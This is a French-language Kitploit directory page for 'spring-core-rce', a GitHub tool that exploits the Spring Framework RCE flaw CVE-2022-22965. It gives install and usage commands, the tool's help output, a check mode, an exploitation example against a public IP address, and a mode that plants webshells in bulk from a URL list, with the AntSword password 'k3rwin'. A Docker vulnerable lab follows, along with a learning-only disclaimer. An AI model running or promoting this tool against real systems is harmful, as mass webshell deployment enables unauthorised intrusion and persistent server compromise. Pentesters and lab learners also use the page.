Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
spring-core-rce — Vulnérabilité RCE du framework Spring CVE-2022-22965 | Kitploit
Outils/GitHubGitHub/k3rwin/spring-core-rce
ReconnaissanceGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubk3rwin/spring-core-rce

spring-core-rce

Vulnérabilité RCE du framework Spring CVE-2022-22965

Voir le dépôt
2811il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spring Core RCE/CVE-2022-22965

Périmètre d'impact : framework Spring et ses dérivés avec JDK >= 9

Article de référence

Ce script est fourni uniquement à des fins d'apprentissage. L'auteur décline toute responsabilité légale en cas d'utilisation abusive.

1. Installation

root@kitploit:~
pip3 install -r requirements.txt

2. Utilisation

root@kitploit:~
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Guide d'aide Spring framework Core 0day RCE

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Spécifier l'URL
  -s SYSTEM, --system SYSTEM
                        Spécifier le système d'exploitation cible, par défaut linux, valeurs possibles : win/linux
  -r FILE, --file FILE  Spécifier un fichier contenant des URLs, pour l'écriture de webshell en masse

3. Exemple

Détection non intrusive

-u, --url ou utiliser -f, --file pour une détection par lots

-c, --check, paramètre pour un service HTTP auto-hébergé, vous pouvez utiliser python3 -m http.server 80 pour lancer rapidement un serveur web

Principalement utilisé en interne et lorsqu'une détection non intrusive de la vulnérabilité est requise

root@kitploit:~
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

image-20220422153433867

Utiliser -u pour spécifier l'URL, -s pour spécifier le système d'exploitation. Valeurs possibles : linux ou win, par défaut linux.

root@kitploit:~
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"

image-20220331203209702

image-20220331203858753

Utiliser -r pour l'écriture de webshell en masse. Connexion avec AntSword, mot de passe : k3rwin

root@kitploit:~
python3 spring-core-rce.py -r "urls.txt"

image-20220402112140568

image-20220402112349943

4. Cibles

①. Monter un environnement Docker local :

docker pull vulfocus/spring-core-rce-2022-03-29:latest

docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29

②. Environnement en ligne

Télécharger l’outil